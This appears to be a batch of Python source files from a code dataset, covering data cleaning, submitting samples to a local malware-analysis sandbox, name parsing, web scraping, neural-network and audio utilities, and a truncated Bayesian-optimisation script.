+{"seq_id":"471535163","text":"wdir = '/home/valencianaplop/vietherb/data/'\n#wdir = '/home/ltly.student/Tri/vietherb/data/'\nfile1 = 'master_record.tsv'\n\nimport os\nimport string\n\ndef refine(str1):\n\tstr1 = str1.split()\n\tfor i in range(1,len(str1)):\n\t\tbase = False\n\t\tfor char in str1[i]:\n\t\t\tif char in string.ascii_uppercase:\n\t\t\t\tstr1 = str1[:i]\n\t\t\t\tbase  = True\n\t\t\t\tbreak\n\t\tif base == True:\n\t\t\tbreak\n\n\tstr1 =  ' '.join(str1)\n\tstr1 = str1.replace('.','').replace('-','')\n\treturn str1\n\t\t\t\n\ndef main():\n\tos.chdir(wdir)\n\tread = open(file1)\n\tsave = open('master_record.tsv.tmp','w')\n\tsave.write(next(read))\n\tfor line in read:\n\t\tcol = line.split('\\t')\n\t\tcol[3] = refine(col[3])\n\t\tline = '\\t'.join(col)\n\t\tsave.write(line+'\\n')\n\tos.system('mv '+file1+'.tmp '+file1)\n\t\nmain()\t\n","sub_path":"bin/refine_2.py","file_name":"refine_2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"538196790","text":"#-*-coding:utf-8-*-\nimport requests, os, subprocess\n\nimport time, sys, pickle\nimport multiprocessing as mp\n\nREST_URL = \"http://localhost:8090/tasks/create/file\"\n#DIRECTORY = \"/home/seclab/virussign_20170727\"\n\ndef explorer( root ):\n    ret = []\n    file_list = []\n\n    save_root_path = \"/home/seclab/Desktop/report\"\n    save_dir_path = \"\"\n    before_save_dir_name = \"\"\n\n    for p, dir, files in os.walk(root) :\n\n        save_dir_name_check = p.split(os.sep)[-1]\n\n\n        if \"virussign\" in save_dir_name_check:\n            if not os.path.exists(os.path.join(save_root_path, save_dir_name_check.split(\"_\")[1])):\n                save_dir_name = save_dir_name_check.split(\"_\")[1]\n                save_dir_path = os.path.join(save_root_path, save_dir_name)\n                os.mkdir(save_dir_path)\n\n                before_save_dir_name = save_dir_name\n\n        if len(file_list) > 0 and before_save_dir_name != save_dir_name:\n            with open(os.path.join(save_root_path, before_save_dir_name, \"classify.csy\"), \"wb\") as f:\n                pickle.dump(file_list, f)\n            file_list.clear()\n\n\n\n        # if root_dir[1] != '':\n        #     tmp = os.path.join(root_path, p.split(root.split(os.sep)[-1])[1][1:])\n        # else :\n        #     tmp = root_path\n        # if len(dir) != 0 :\n        #     for dir_name in dir :\n        #         try :\n        #             os.mkdir(os.path.join(tmp, dir_name))\n        #         except :\n        #             pass\n        if not dir:\n            dir_name = p.split(os.sep)[-1]\n\n            if dir_name == \"dll32\" or dir_name == \"exe32\":\n                for file in files:\n                    ret.append(os.path.join(p, file))\n                    file_list.append(file)\n\n            if dir_name == \"dll64\" or dir_name == \"exe64\":\n                for file in files:\n                    file_list.append(file)\n\n    return ret\n\n\ndef get_file_name ( file_path ) :\n    return os.path.basename(file_path)\n\n\ndef send_file(file_path):\n    with open(file_path, 'rb') as f:\n        file_name = get_file_name(file_path)\n        fs = {'file' : (file_name, f)}\n        r = requests.post(REST_URL, files=fs)\n        if r.status_code == 200:\n            print(\"{} is succeeded\".format(file_name))\n        else :\n            print(\"{} is failed\".format(file_name))\n\n\ndef run(root, process_count=os.cpu_count()):\n    file_path_list = explorer(root)\n    mp.freeze_support()\n    p = mp.Pool(process_count)\n    p.map(send_file, file_path_list)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) == 2:\n        start = time.time()\n        run(sys.argv[1])\n        print(\"Time : {}\".format(time.time() - start))\n    elif len(sys.argv) == 3:\n        start = time.time()\n        run(sys.argv[1], int(sys.argv[2]))\n        print(\"Time : {}\".format(time.time() - start))\n\n\n","sub_path":"script/upload_virussign.py","file_name":"upload_virussign.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"391097444","text":"\"\"\"Various routines that deal with names\"\"\"\ndef formatfullname(name):\n    \"\"\"Returns a string of the name, including all fields that are present\"\"\"\n    res=\"\"\n    full=name.get(\"full\", \"\")\n    fml=\"\"\n    f=name.get(\"first\", \"\")\n    m=name.get(\"middle\", \"\")\n    l=name.get(\"last\", \"\")\n    if len(f) or len(m) or len(l):\n        fml+=f\n        if len(m) and len(fml) and fml[-1]!=' ':\n            fml+=\" \"\n        fml+=m\n        if len(l) and len(fml) and fml[-1]!=' ':\n            fml+=\" \"\n        fml+=l\n    if len(fml) or len(full):\n        if fml==full:\n            res+=full\n        else:\n            if len(full):\n                res+=full\n            if len(fml):\n                if len(res):\n                    res+=\" | \"\n                res+=fml\n    if name.has_key(\"nickname\"):\n        res+=\" (\"+name[\"nickname\"]+\")\"\n    return res\ndef formatsimplename(name):\n    \"like L{formatname}, except we use the first matching component\"\n    if len(name.get(\"full\", \"\")):\n        return name.get(\"full\")\n    f=name.get(\"first\", \"\")\n    m=name.get(\"middle\", \"\")\n    l=name.get(\"last\", \"\")\n    if len(f) or len(m) or len(l):\n        return \" \".join([p for p in (f,m,l) if len(p)])\n    return name.get('nickname', \"\")\ndef formatsimplelastfirst(name):\n    \"Returns the name formatted as Last, First Middle\"\n    f,m,l=getparts(name)\n    if len(l):\n        if len(f+m):\n            return l+\", \"+\" \".join([f,m])\n        return l\n    return \" \".join([f,m])\ndef getfullname(name):\n    \"\"\"Gets the full name, joining the first/middle/last if necessary\"\"\"\n    if name.has_key(\"full\"):\n        return name[\"full\"]\n    parts=[name.get(part, \"\") for part in (\"first\", \"middle\", \"last\")]\n    return \" \".join([part for part in parts if len(part)])\nlastparts= [ \"van\", \"von\", \"de\", \"di\" ]\ndef getparts(name):\n    \"\"\"Returns (first, middle, last) for name.  If the part doesn't exist\n    then a blank string is returned\"\"\"\n    for i in (\"first\", \"middle\", \"last\"):\n        if name.has_key(i):\n            return (name.get(\"first\", \"\"), name.get(\"middle\", \"\"), name.get(\"last\", \"\"))\n    if not name.has_key(\"full\"):\n        return (name.get(\"nickname\", \"\"), \"\", \"\")\n    n=name.get(\"full\")\n    parts=n.split()\n    if len(parts)<=1:\n        return (n, \"\", \"\")\n    if len(parts)==2:\n        return (parts[0], \"\", parts[1])\n    f=[parts[0]]\n    m=[]\n    l=[parts[-1]]\n    del parts[0]\n    del parts[-1]\n    while len(parts) and (parts[-1][0].lower()==parts[-1][0] or parts[-1].lower() in lastparts):\n        l=[parts[-1]]+l\n        del parts[-1]\n    m=parts\n    return (\" \".join(f), \" \".join(m), \" \".join(l))\ndef getfirst(name):\n    return getparts(name)[0]\ndef getmiddle(name):\n    return getparts(name)[1]\ndef getlast(name):\n    return getparts(name)[2]\n","sub_path":"BitPim/rev3177-3296/base-trunk-3177/nameparser.py","file_name":"nameparser.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"209484433","text":"chrome_driver_path = \"C:/Yogesh/Softwares/chromedriver_win32/chromedriver.exe\"\nfrom selenium import webdriver\ndriver = webdriver.Chrome(executable_path=chrome_driver_path)\n\ndriver.get(\"https://www.amazon.in/dp/B07X8V5YKR/ref=pc_mcnc_merchandised-search-11_?pf_rd_s=merchandised-search-11&pf_rd_t=Gateway&pf_rd_i=mobile&pf_rd_m=A1VBAL9TL5WCBF&pf_rd_r=TQEZZ2RGHSW33KFQGDSJ&pf_rd_p=4c0716f1-441a-47ee-ad12-281cdb914f9a\")\nprice = driver.find_element_by_id(\"priceblock_dealprice\")\n# price = driver.find_element_by_id(\"\")\nprint(price.text)\npriceX = driver.find_element_by_xpath('//*[@id=\"priceblock_dealprice\"]')\nprint(priceX.text)\n# driver.close()\ndriver.quit()","sub_path":"Day48-Selenium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"200157418","text":"from teem import OperationPayload\n\n\nclass Server():\n    \"\"\"Receives operations from clients, transforms, and replies to clients.\"\"\"\n\n    def __init__(self, document, storage):\n        self.document = document\n        self.storage = storage\n\n    def receive_operation(self, operation_payload):\n        \"\"\"\n        Handles an incoming operation from a client.\n\n        Receives the operation, transforms it against all subsequent\n        operations, applies it to the current document, and returns the\n        operation to send to all clients.\n        \"\"\"\n        parent = operation_payload.parent\n        operation = operation_payload.operation\n        subsequent_operations = self.storage.get_subsequent(operation_payload)\n        for subsequent_operation in subsequent_operations:\n            operation, _ = operation.transform(subsequent_operation.operation)\n            parent = subsequent_operation.parent\n        self.document = operation.apply(self.document)\n        operation_payload = OperationPayload(\n            parent,\n            operation_payload.uuid,\n            operation,\n        )\n        self.backend.save_operation(operation_payload)\n        return operation_payload\n","sub_path":"teem/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"368968066","text":"from TaxonDictionary import TaxonDictionary\n\nclass TaxonPackage(TaxonDictionary):\n\t\"\"\" Пакет. Контейнер для группы модулей и других пакетов.\n\tДля Wpp-сообщества (и большинства других) это директория.\n\tНо для JS может осуществляться объединение пакетов и модулей в один файл.\n\t\"\"\"\n\ttype = 'Package'\n\n\tdef export(self, outContext):\n\t\tnewContext = outContext.createFolder(self.name)\n\t\tself.onNewFolder(newContext)\n\t\tfor item in self.items:\n\t\t\titem.export(newContext)\n\n\tdef onNewFolder(self, outContext):\n\t\tpass\n\n\tdef findUp(self, name, fromWho, source):\n\t\t\"\"\" Поиск внутри пакета предполагает, что надо искать во вложенных пакетах и модулях\n\t\t\"\"\"\n\t\tif self.name == name:\n\t\t\treturn self\n\t\tresults = []\n\t\tfor i in self.items:\n\t\t\tif i != fromWho:\n\t\t\t\t# Имя модуля не участвует в поиске. Т.к. часто имя класса совпадает с именем модуля. И нужно находить класс, а не модуль\n\t\t\t\tif i.name == name and i.type != 'Module':\n\t\t\t\t\treturn i\n\t\t\t\tresults += i.findDown(name)\n\t\tif len(results) == 1:\n\t\t\treturn results[0]\n\t\t# Вполне возможно, что в разных пакетах будут таксоны с одинаковыми именами\n\t\t# В этом случае нужно сгенерировать ошибку. Т.к. для точного указания нужно имя пакета\n\t\tif len(results) > 1:\n\t\t\tmsg = 'Multiply declaration of \"'+name+'\" in ['\n\t\t\tmsg += ', '.join([res.getPath() for res in results]) + ']'\n\t\t\tsource.throwError(msg)\n\t\tif self.owner:\n\t\t\treturn self.owner.findUp(name, self, source)\n\n\tdef findDown(self, name):\n\t\t\"\"\" Поиск вниз для пакета предполагает обход всех подчиненных\n\t\tПотому что это подчиненные пакеты или модули\n\t\t\"\"\"\n\t\tresults = []\n\t\tif self.name == name:\t# Пакеты участвуют в поиске по имени, в отличие от модулей\n\t\t\tresults.append(self)\n\t\tfor i in self.items:\n\t\t\tresults += i.findDown(name)\n\t\treturn results\n","sub_path":"src/core/TaxonPackage.py","file_name":"TaxonPackage.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"51330724","text":"'''\n\n  Created by irving on 8/10/18\n\n'''\nimport pickle\nimport cv2\nfrom modules.sample import Sample\nfrom modules.loader import Loader\nfrom modules.settings import ProjectSettings\nimport random\n\nwith open('body_face_sample.pickle', 'rb') as f:\n    body_face_samples: {str: Sample} = pickle.load(f)\nwith open('car_sample.pickle', 'rb') as f:\n    car_samples: {str: Sample} = pickle.load(f)\n\ncustom_samples = body_face_samples.copy()\ncustom_samples.update(car_samples)\n\nkeys = list(custom_samples.keys())\nrandom.shuffle(keys)\ncustom_samples = {key: custom_samples[key] for key in keys}\n\nsettings = ProjectSettings(\"settings.yaml\")\n\n# Load the label mapping.\nloader = Loader()\nloader.load_labels(settings.LABELS_FILE)\n\nbody_face_labels = ['/m/04yx4', '/m/03bt1vf', '/m/01g317', '/m/05r655', '/m/01bl7v',\n                    '/m/0dzct', '/m/04hgtk']\n\ncar_labels = ['/m/01prls']\n\nfor key, value in custom_samples.items():\n    labelled_image = value.get_visualized_image_custom_label(label_map_function=loader.get_label,\n                                                             custom_label=car_labels + body_face_labels)\n    cv2.imwrite(ProjectSettings.instance().CUSTOM_LABELLED_DIRECTORY +\n                key + '.jpg', labelled_image)\n    cv2.imshow('Vis', labelled_image)\n    cv2.waitKey(0)\n","sub_path":"custom_visualization.py","file_name":"custom_visualization.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"606914197","text":"from app import app\nfrom app.models import User\nfrom flask_script import Manager\n\nmanage = Manager(app)\n\n@manage.command\ndef save():\n    todo = User(username='study flask')\n    todo.save()\n\n\n\nif __name__ =='__main__':\n    manage.run()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"466144497","text":"# Lint as: python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nr\"\"\"Runs shot classification on video files.\n\nCan output to either a video file or to the UI (default).\n\nRequires cv2 from `sudo apt-get install python3-opencv`\n\npython3 examples/video_file_demo.py \\\n  --input_video data/shot_classification.mp4\n  --input_video data/shot_classification_annotated.mp4\n  --model data/shot_classification_model.pb \\\n  --label data/shot_classification_label_map.pbtxt\n\nTo output to UI instead of file, do not include the \"--output_video\" argument.\n\npython3 examples/video_file_demo.py \\\n  --input_video data/shot_classification.mp4\n  --model data/shot_classification_model.pb \\\n  --label data/shot_classification_label_map.pbtxt\n\nPress Q key to exit.\n\"\"\"\nimport argparse\nfrom automl_video_ondevice import shot_classification as vcn\nimport utils\n\ntry:\n  import cv2  # pylint: disable=g-import-not-at-top\nexcept:  # pylint: disable=bare-except\n  print(\"Couldn't load cv2. Try running: sudo apt install python3-opencv.\")\n\n\ndef main():\n  default_video = 'data/shot_classification.mp4'\n  default_model = 'data/shot_classification_model.pb'\n  default_labels = 'data/shot_classification_label_map.pbtxt'\n  parser = argparse.ArgumentParser()\n  parser.add_argument('--model', help='model path', default=default_model)\n  parser.add_argument(\n      '--labels', help='label file path', default=default_labels)\n  parser.add_argument(\n      '--input_video', help='input video file path', default=default_video)\n  parser.add_argument(\n      '--output_video', help='output video file path', default='')\n  parser.add_argument(\n      '--threshold', type=float, default=0.2, help='class score threshold')\n  parser.add_argument(\n      '--use_tracker', type=bool, default=False, help='use an object tracker')\n  parser.add_argument(\n      '--top_k',\n      type=int,\n      default=1,\n      help='The number of results to return, ordered by highest to lowest score.'\n  )\n  args = parser.parse_args()\n\n  print('Loading %s with %s labels.' 
% (args.model, args.labels))\n\n  config = vcn.ShotClassificationConfig(\n      score_threshold=args.threshold, top_k=args.top_k)\n  engine = vcn.load(args.model, args.labels, config)\n  input_size = engine.input_size()\n\n  cap = cv2.VideoCapture(args.input_video)\n\n  writer = None\n  if cap.isOpened() and args.output_video:\n    writer = cv2.VideoWriter(args.output_video, cv2.VideoWriter_fourcc(*'mp4v'),\n                             cap.get(cv2.CAP_PROP_FPS),\n                             (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n                              int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))))\n\n  timestamp = 0\n  while cap.isOpened():\n    ret, frame = cap.read()\n\n    if not ret:\n      break\n\n    # Resizes frame.\n    resized_frame = cv2.resize(frame, (input_size.width, input_size.height))\n    rgb_frame = cv2.cvtColor(resized_frame, cv2.COLOR_BGR2RGB)\n\n    # Calculates current microsecond for timestamp.\n    timestamp = int(timestamp + (1/cap.get(cv2.CAP_PROP_FPS)) * 1000 * 1000)\n\n    # Run inference engine to populate annotations array.\n    annotations = []\n    if engine.run(timestamp, rgb_frame, annotations):\n      frame = utils.render_classifications(frame, annotations)\n\n    if writer:\n      writer.write(frame)\n    else:\n      cv2.imshow('frame', frame)\n      if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n  if writer:\n    writer.release()\n  else:\n    cv2.destroyAllWindows()\n  cap.release()\n\n\nif __name__ == '__main__':\n  main()\n","sub_path":"examples/video_classification_file_demo.py","file_name":"video_classification_file_demo.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"467122473","text":"from lib import *\nimport hw6\nfrom hw6 import *\n\n\nclass Div2(Pretty):\n\n    def __init__(i, lst, x=0, y=6, yis=\"Num\"):\n        i.yis = yis\n        i.x_lst, i.y_lst = i.getObjects(sorted(lst, key=lambda xyz: xyz[y]), yis, x, y)\n        i.b4 = i.y_lst\n        # print(i.x_lst.sd,i.y_lst.mode)\n        i._lst = i.y_lst.numList if i.yis == \"Num\" else i.y_lst.symList\n        i.gain = 0\n        i.step = int(i.y_lst.count ** THE.div.min)\n        i.stop = last(i._lst)\n        i.start = first(i._lst)\n        i.ranges = []\n        i.xranges = []\n        i.epsilon = i.b4.sd * THE.div.cohen\n        # print(i.epsilon)\n        i.rank, i.cut, i.best = i.__divide(1, i.y_lst.count, i.b4, 1)\n        i.gain /= len(i._lst)\n\n    def getObjects(i, data, yis, x, y):\n        x_lst = hw6.Num()\n        if yis == \"Num\":\n            y_lst = hw6.Num()\n        else:\n            y_lst = hw6.Sym()\n        for i in data:\n            x_lst.num2(i[x])\n            if yis == \"Num\":\n                y_lst.num2(i[y])  # change\n            else:\n                y_lst.Sym2(i[y])\n        return x_lst, y_lst\n\n    def xis(i, lst):\n        num = hw6.Num()\n        for i in lst:\n            num.num2(i)\n        return num\n\n    def yis1(i, lst, key):\n        sym = hw6.Sym()\n        for row in lst:\n            sym.Sym2(row[key])\n        return sym\n\n    def symSplit(i, lst):\n        sym = hw6.Sym()\n        for i in lst:\n            sym.Sym2(i)\n        return sym\n\n    def xSplit(i):\n        start = 0\n        for j in i.ranges:\n            i.xranges.append(i.xis(i.x_lst.numList[start:start + j.count]))\n            start += j.count\n        return 1, len(i.ranges)\n\n    def printSplits(i):\n        if i.yis == \"Num\":\n            print(\"\\nPart 1:\")\n            for k in range(len(i.ranges)):\n                x = i.xranges[k]\n                y = i.ranges[k]\n                print(k + 1, \"  x.n\\t\" + str(x.count) + \" | x.lo \\t\" + str(\n                    round(x.lo, 5)) + \" | x.hi \\t\" + str(\n                    round(x.hi, 5)) + \" | y.lo \\t\" + str(round(y.lo, 5)) + \" | y.hi \\t\" + str(round(y.hi, 5)))\n        else:\n            print(\"\\nPart 2:\")\n            for k in range(len(i.ranges)):\n                x = i.xranges[k]\n                y = i.ranges[k]\n                print(k + 1, \"  x.n\\t\" + str(x.count) + \" | x.lo \\t\" + str(\n                    round(x.lo, 5)) + \" | x.hi \\t\" + str(\n                    round(x.hi, 5)) + \"  | y.mode \\t\" + str(y.mode) + \" | y.ent \\t \" + str(round(y.sd, 5)))\n\n    def __divide(i, lo, hi, b4, rank):\n\n        \"Find a split between lo and hi, then recurse on each split.\"\n\n        if i.yis == \"Num\":\n            l = i.xis([])\n            r = i.xis(i._lst[lo:hi])\n            i.stop = last(b4.numList)\n            i.start = first(b4.numList)\n        else:\n            l = i.symSplit([])\n            r = i.symSplit(i._lst[lo:hi])\n            i.stop = last(b4.symList)\n            i.start = first(b4.symList)\n        i.epsilon = b4.sd * THE.div.cohen\n        best = b4.sd\n        cut = None\n        for j in range(lo, hi):\n            if i.yis == \"Num\":\n                print(i._lst[j])\n                l.num2(i._lst[j])\n                r.numLess2(0)\n                print(r.numList)\n            else:\n                l.Sym2(i._lst[j])\n                r.symLess(i._lst[j])\n\n            if l.count >= i.step:\n                if r.count >= i.step:\n                
    now = i._lst[j - 1]\n                    after = i._lst[j]\n                    if now == after: continue\n                    if i.yis == \"Num\":\n                        if abs(r.mu - l.mu) >= i.epsilon:\n                            if after - i.start >= i.epsilon:\n                                if i.stop - now >= i.epsilon:\n                                    xpect = l.xpect(r)\n                                    if xpect * THE.div.trivial < best:\n                                        best, cut = xpect, j\n                    else:\n                        if abs(ord(l.mode) - ord(r.mode)) >= i.epsilon:\n                            if ord(after) - ord(i.start) >= i.epsilon:\n                                if ord(i.stop) - ord(now) >= i.epsilon:\n                                    xpect = l.xpect(r)\n                                    if xpect * THE.div.trivial < best:\n                                        best, cut = xpect, j\n        if cut:\n            ls, rs = i._lst[lo:cut], i._lst[cut:hi]\n            if i.yis == \"Num\":\n                rank = i.__divide(lo, cut, i.xis(ls), rank)[0] + 1\n                rank = i.__divide(cut, hi, i.xis(rs), rank)[0]\n            else:\n                rank = i.__divide(lo, cut, i.symSplit(ls), rank)[0] + 1\n                rank = i.__divide(cut, hi, i.symSplit(rs), rank)[0]\n        else:\n            i.gain += b4.count * b4.sd\n            b4.rank = rank\n            i.ranges += [b4]\n        return rank, cut, best\n","sub_path":"hw/6/div.py","file_name":"div.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"459819718","text":"'''VGG11/13/16/19 in Pytorch.\n\nWe perturb the weight and bias parameters for convolutional, linear and batch\nnormalization layers.\n\n'''\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn.modules.utils import _pair\n\ncfg = {\n    'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n    'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512,\n              512, 'M'],\n    'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512,\n              'M', 512, 512, 512, 'M'],\n    'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512,\n              512, 512, 'M', 512, 512, 512, 512, 'M'],\n}\n\n\ndef perturb_param(param, param_noise, buffer_noise):\n    if param_noise > 0:\n        buffer_noise.normal_(0, param_noise)\n    return param + buffer_noise\n\n\nclass LinearNoise(nn.Linear):\n    \"\"\"\n    For the linear layer we perturb the weights and the additive bias.\n    \"\"\"\n\n    def __init__(self, in_features, out_features, bias=True,\n                 param_noise=0.04):\n        super(LinearNoise, self).__init__(in_features=in_features,\n                                          out_features=out_features,\n                                          bias=bias)\n        self.param_noise = param_noise\n        self.buffer_weight_noise = None\n\n    def forward(self, input):\n        if self.buffer_weight_noise is None:\n            self.buffer_weight_noise = torch.zeros_like(\n                self.weight, requires_grad=False)\n            if self.param_noise > 0:\n                self.buffer_weight_noise.normal_(\n                    0, self.param_noise).to(self.weight.device)\n        weight = perturb_param(param=self.weight,\n                               param_noise=self.param_noise,\n                               buffer_noise=self.buffer_weight_noise)\n        return F.linear(input, weight, self.bias)\n\n\nclass BatchNorm2dNoise(nn.BatchNorm2d):\n    def __init__(self, num_features,\n                 param_noise=0.04):\n        super(BatchNorm2dNoise, self).__init__(num_features=num_features)\n        self.param_noise = param_noise\n        self.buffer_weight_noise = None\n\n    def forward(self, input):\n        self._check_input_dim(input)\n\n        if self.buffer_weight_noise is None:\n            self.buffer_weight_noise = torch.zeros_like(\n                self.weight, requires_grad=False)\n            if self.param_noise > 0:\n                self.buffer_weight_noise.normal_(\n                    0, self.param_noise).to(self.weight.device)\n        weight = perturb_param(param=self.weight,\n                               param_noise=self.param_noise,\n                               buffer_noise=self.buffer_weight_noise)\n        # exponential_average_factor is set to self.momentum\n        # (when it is available) only so that if gets updated\n        # in ONNX graph when this node is exported to ONNX.\n        if self.momentum is None:\n            exponential_average_factor = 0.0\n        else:\n            exponential_average_factor = self.momentum\n\n        if self.training and self.track_running_stats:\n            # TODO: if statement only here to tell the jit to skip emitting this when it is None\n            if self.num_batches_tracked is not None:\n                self.num_batches_tracked += 1\n                if self.momentum is None:  # use cumulative moving average\n                    exponential_average_factor = 1.0 / 
float(\n                        self.num_batches_tracked)\n                else:  # use exponential moving average\n                    exponential_average_factor = self.momentum\n\n        return F.batch_norm(\n            input, self.running_mean, self.running_var, weight, self.bias,\n            self.training or not self.track_running_stats,\n            exponential_average_factor, self.eps)\n\n\nclass VGG(nn.Module):\n    def __init__(self, vgg_name, param_noise=0.04):\n        super(VGG, self).__init__()\n        self.param_noise = param_noise\n        self.classifier = LinearNoise(512, 10, param_noise=self.param_noise)\n        self.features = self._make_layers(cfg[vgg_name])\n\n    def forward(self, x):\n        out = self.features(x)\n        out = out.view(out.size(0), -1)\n        out = self.classifier(out)\n        return out\n\n    def _make_layers(self, cfg):\n        layers = []\n        in_channels = 3\n        for i, x in enumerate(cfg):\n            if x == 'M':\n                layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n            else:\n                layers += [\n                    nn.Conv2d(in_channels, x, kernel_size=3, padding=1),\n                    BatchNorm2dNoise(x, param_noise=self.param_noise),\n                    nn.ReLU(inplace=True)]\n                in_channels = x\n        layers += [nn.AvgPool2d(kernel_size=1, stride=1)]\n        return nn.Sequential(*layers)\n\n# net = VGG('VGG11')\n# x = torch.randn(2,3,32,32)\n# print(net(Variable(x)).size())\n","sub_path":"cnns/nnlib/pytorch_architecture/vgg_perturb_fc_bn.py","file_name":"vgg_perturb_fc_bn.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"548269721","text":"from pydub import AudioSegment\nfrom scipy.io.wavfile import write\nimport numpy as np\nimport sys\n\n\naudio_path = sys.argv[1]\nnew_audio_path = sys.argv[2]\naudio_format = \"wav\"\n\n\ndef detect_leading_silence(sound, silence_threshold=-50.0, chunk_size=10):\n    trim_ms = 0  # ms\n\n    assert chunk_size > 0  # to avoid infinite loop\n    while sound[\n        trim_ms : trim_ms + chunk_size\n    ].dBFS < silence_threshold and trim_ms < len(sound):\n        trim_ms += chunk_size\n\n    return trim_ms\n\n\nsound = AudioSegment.from_file(audio_path, format=audio_format)\n\nstart_trim = detect_leading_silence(sound)\nend_trim = detect_leading_silence(sound.reverse())\n\nduration = len(sound)\ntrimmed_sound = sound[start_trim : duration - end_trim]\n\ntrimmed_sound.export(new_audio_path, format=audio_format)\n\n","sub_path":"removeSilence.py","file_name":"removeSilence.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"478212367","text":"# %% [markdown]\n# ## Using non-linear inequality constraints in Ax\n# This notebook comes with the following caveats:\n# 1. The search space has to be [0, 1]^d\n# 2. We need to pass in explicit `batch_initial_conditions` that satisfy the non-linear inequality constraints as starting points for optimizing the acquisition function.\n# 3. BATCH_SIZE must be equal to 1.\n\n# %%\nfrom copy import copy\nfrom os.path import join\nfrom pathlib import Path\nimport random\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport torch\n\nfrom botorch.acquisition import ExpectedImprovement\nfrom botorch.fit import fit_gpytorch_model\nfrom botorch.models import SingleTaskGP\nfrom botorch.models.transforms import Standardize\nfrom gpytorch.mlls import ExactMarginalLogLikelihood\nfrom torch.nn.functional import normalize\n\nfrom ax import (\n    Data,\n    Experiment,\n    ParameterType,\n    RangeParameter,\n    SearchSpace,\n    SumConstraint,\n)\n\nfrom ax.storage.json_store.save import save_experiment\n\n# %%\nfrom ax.core.objective import Objective\nfrom ax.core.optimization_config import OptimizationConfig\nfrom utils.extraordinary import extraordinary_probability\n\nfrom utils.metrics import CrabNetMetric\nfrom utils.search import search_space\n\n# from ax.utils.measurement.synthetic_functions import Hartmann6\nfrom ax.modelbridge.registry import Models\nfrom ax.runners.synthetic import SyntheticRunner\nfrom torch.quasirandom import SobolEngine\n\nfrom utils.sobol_candidates import nchoosek_sobol\n\ndummy = False\n\nresult_dir = \"results\"\nPath(result_dir).mkdir(exist_ok=True)\n\nnoise_sd = 0.1\nsynth_dither = 0.1\nsem = None\n\nd = 5  # HARD-CODED PARAMETER, i.e. 5 + 1 = 6 for Hartmann6Metric\nparam_names = [f\"x{i}\" for i in range(d + 1)]\nsubparam_names = param_names[:-1]  # sub-parameter names (i.e. all but last component)\nparams = [\n    RangeParameter(\n        name=parameter_name, parameter_type=ParameterType.FLOAT, lower=0.0, upper=1.0,\n    )\n    for parameter_name in subparam_names\n]\n\nmetric = CrabNetMetric(name=\"objective\")\noptimization_config = OptimizationConfig(\n    objective=Objective(metric=metric, minimize=True,)\n)\n\n# %% Let's see how we do via a brute force search\nif dummy:\n    comb_m = 10\nelse:\n    comb_m = 18\ncandidates = nchoosek_sobol(\n    param_names, n_slots=3, comb_m=comb_m, fixed_compositions=False\n)\nprint(f\"{len(candidates)} SOBOL candidates generated\")\n# compute the dither all at once, and add it to hartmann6 to get \"true\" fn\ndither = metric.interp(candidates)\nnoise_free = metric.f_without_dither\nys = [noise_free(x) for x in candidates.values[:, :5]]\nys = np.array(ys) + dither\nidx = np.argmin(ys)\nprint(f\"minimum estimated via SOBOL search with true values: {ys[idx]:.4f}\")\nx_opt = candidates.iloc[idx]\n\n# probability of finding a candidate within some percent of the estimated optimum\nys_noise = ys + noise_sd * np.random.randn(len(ys))\n# for seemingly extraordinary candidates, do repeats to verify (i.e. with true values)\n# mn = min(ys)\n# mx = max(ys)\nmn = -1.484  # as estimated by SAASBO\nprint(f\"minimum estimated previously by SAASBO: {mn:.3f}\")\nmx = 0.0\nthresh = 0.10  # i.e. 
